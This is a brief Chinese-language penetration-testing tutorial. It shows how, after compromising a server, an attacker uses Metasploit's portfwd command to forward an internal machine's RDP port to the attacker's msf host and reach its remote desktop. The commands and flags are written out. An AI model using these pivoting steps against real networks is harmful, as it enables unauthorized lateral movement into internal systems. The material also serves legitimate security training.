拿下目标服务器,开始对内网进行探测。
此时,服务器是公网IP,但是我们想要访问内网中 192.168.234.160 的3389端口,登上远程桌面。由于在内网,我们无法直接连接,所以我们需要端口转发,将192.168.234.160机器的3389端口转发到msf机器上的某一个端口。
portfwd -h
显示帮助
portfwd add -l 33889 -p 3389 -r 192.168.234.160
建立转发
-l 本地端口,进行侦听,转发目标机器上的端口
-p 目标机器上需要转发的端口
-r 是需要转发的ip地址
portfwd list
展示当前正在侦听和转发的端口的列表
接下来,我们访问msf机器上的33889端口,即可连接目标机器的远程桌面